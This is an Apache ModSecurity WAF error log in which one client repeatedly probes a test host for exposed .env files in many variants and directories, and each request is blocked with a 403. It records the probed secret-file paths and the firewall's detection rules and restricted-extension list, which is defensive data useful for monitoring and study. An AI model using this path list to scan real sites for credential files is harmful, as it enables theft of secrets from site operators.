[Thu Feb 26 02:08:22.292076 2026] [:error] [pid 2330788] [client 195.178.110.33:56012] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aZ-dBiSJSniLip0oFXi1sgAAAAA"]
[Thu Feb 26 02:08:22.344196 2026] [:error] [pid 2330788] [client 195.178.110.33:56012] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aZ-dBiSJSniLip0oFXi1swAAAAA"]
[Thu Feb 26 02:08:22.344402 2026] [:error] [pid 2330788] [client 195.178.110.33:56012] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aZ-dBiSJSniLip0oFXi1swAAAAA"]
[Thu Feb 26 02:08:22.344547 2026] [:error] [pid 2330788] [client 195.178.110.33:56012] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aZ-dBiSJSniLip0oFXi1swAAAAA"]
[Thu Feb 26 02:08:22.391591 2026] [:error] [pid 2330788] [client 195.178.110.33:56012] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aZ-dBiSJSniLip0oFXi1tAAAAAA"]
[Thu Feb 26 02:08:22.391794 2026] [:error] [pid 2330788] [client 195.178.110.33:56012] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aZ-dBiSJSniLip0oFXi1tAAAAAA"]
[Thu Feb 26 02:08:22.391963 2026] [:error] [pid 2330788] [client 195.178.110.33:56012] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aZ-dBiSJSniLip0oFXi1tAAAAAA"]
[Thu Feb 26 02:08:22.421802 2026] [:error] [pid 2330788] [client 195.178.110.33:56012] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aZ-dBiSJSniLip0oFXi1tQAAAAA"]
[Thu Feb 26 02:08:22.422008 2026] [:error] [pid 2330788] [client 195.178.110.33:56012] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aZ-dBiSJSniLip0oFXi1tQAAAAA"]
[Thu Feb 26 02:08:22.422166 2026] [:error] [pid 2330788] [client 195.178.110.33:56012] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aZ-dBiSJSniLip0oFXi1tQAAAAA"]
[Thu Feb 26 02:08:22.584971 2026] [:error] [pid 2331047] [client 195.178.110.33:56018] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aZ-dBpqP6Uim1aZiP_g67AAAAAY"]
[Thu Feb 26 02:08:22.585216 2026] [:error] [pid 2331047] [client 195.178.110.33:56018] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aZ-dBpqP6Uim1aZiP_g67AAAAAY"]
[Thu Feb 26 02:08:22.585410 2026] [:error] [pid 2331047] [client 195.178.110.33:56018] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aZ-dBpqP6Uim1aZiP_g67AAAAAY"]
[Thu Feb 26 02:08:22.682851 2026] [:error] [pid 2331047] [client 195.178.110.33:56018] [client 195.178.110.33] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aZ-dBpqP6Uim1aZiP_g67gAAAAY"]
[Thu Feb 26 02:08:22.682971 2026] [:error] [pid 2331047] [client 195.178.110.33:56018] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aZ-dBpqP6Uim1aZiP_g67gAAAAY"]
[Thu Feb 26 02:08:22.683178 2026] [:error] [pid 2331047] [client 195.178.110.33:56018] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aZ-dBpqP6Uim1aZiP_g67gAAAAY"]
[Thu Feb 26 02:08:22.683372 2026] [:error] [pid 2331047] [client 195.178.110.33:56018] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aZ-dBpqP6Uim1aZiP_g67gAAAAY"]
[Thu Feb 26 02:08:22.717556 2026] [:error] [pid 2331047] [client 195.178.110.33:56018] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aZ-dBpqP6Uim1aZiP_g67wAAAAY"]
[Thu Feb 26 02:08:22.717818 2026] [:error] [pid 2331047] [client 195.178.110.33:56018] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aZ-dBpqP6Uim1aZiP_g67wAAAAY"]
[Thu Feb 26 02:08:22.718031 2026] [:error] [pid 2331047] [client 195.178.110.33:56018] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aZ-dBpqP6Uim1aZiP_g67wAAAAY"]
[Thu Feb 26 02:08:29.156832 2026] [:error] [pid 2332243] [client 195.178.110.33:56144] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aZ-dDbSZ0-i57Co9sRVoYQAAAAo"]
[Thu Feb 26 02:08:29.157072 2026] [:error] [pid 2332243] [client 195.178.110.33:56144] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aZ-dDbSZ0-i57Co9sRVoYQAAAAo"]
[Thu Feb 26 02:08:29.157252 2026] [:error] [pid 2332243] [client 195.178.110.33:56144] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aZ-dDbSZ0-i57Co9sRVoYQAAAAo"]
[Thu Feb 26 02:08:29.208422 2026] [:error] [pid 2332243] [client 195.178.110.33:56144] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aZ-dDbSZ0-i57Co9sRVoYgAAAAo"]
[Thu Feb 26 02:08:29.208649 2026] [:error] [pid 2332243] [client 195.178.110.33:56144] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aZ-dDbSZ0-i57Co9sRVoYgAAAAo"]
[Thu Feb 26 02:08:29.208825 2026] [:error] [pid 2332243] [client 195.178.110.33:56144] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aZ-dDbSZ0-i57Co9sRVoYgAAAAo"]
[Thu Feb 26 02:08:29.260368 2026] [:error] [pid 2332243] [client 195.178.110.33:56144] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aZ-dDbSZ0-i57Co9sRVoYwAAAAo"]
[Thu Feb 26 02:08:29.260590 2026] [:error] [pid 2332243] [client 195.178.110.33:56144] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aZ-dDbSZ0-i57Co9sRVoYwAAAAo"]
[Thu Feb 26 02:08:29.260766 2026] [:error] [pid 2332243] [client 195.178.110.33:56144] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aZ-dDbSZ0-i57Co9sRVoYwAAAAo"]
[Thu Feb 26 02:08:29.312559 2026] [:error] [pid 2332243] [client 195.178.110.33:56144] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aZ-dDbSZ0-i57Co9sRVoZAAAAAo"]
[Thu Feb 26 02:08:29.312768 2026] [:error] [pid 2332243] [client 195.178.110.33:56144] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aZ-dDbSZ0-i57Co9sRVoZAAAAAo"]
[Thu Feb 26 02:08:29.312935 2026] [:error] [pid 2332243] [client 195.178.110.33:56144] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aZ-dDbSZ0-i57Co9sRVoZAAAAAo"]
[Thu Feb 26 02:08:29.372833 2026] [:error] [pid 2332243] [client 195.178.110.33:56144] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aZ-dDbSZ0-i57Co9sRVoZQAAAAo"]
[Thu Feb 26 02:08:29.373052 2026] [:error] [pid 2332243] [client 195.178.110.33:56144] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aZ-dDbSZ0-i57Co9sRVoZQAAAAo"]
[Thu Feb 26 02:08:29.373242 2026] [:error] [pid 2332243] [client 195.178.110.33:56144] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aZ-dDbSZ0-i57Co9sRVoZQAAAAo"]
[Thu Feb 26 02:08:29.428676 2026] [:error] [pid 2332243] [client 195.178.110.33:56144] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aZ-dDbSZ0-i57Co9sRVoZgAAAAo"]
[Thu Feb 26 02:08:29.428901 2026] [:error] [pid 2332243] [client 195.178.110.33:56144] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aZ-dDbSZ0-i57Co9sRVoZgAAAAo"]
[Thu Feb 26 02:08:29.429097 2026] [:error] [pid 2332243] [client 195.178.110.33:56144] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aZ-dDbSZ0-i57Co9sRVoZgAAAAo"]
[Thu Feb 26 02:08:29.483674 2026] [:error] [pid 2332243] [client 195.178.110.33:56144] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aZ-dDbSZ0-i57Co9sRVoZwAAAAo"]
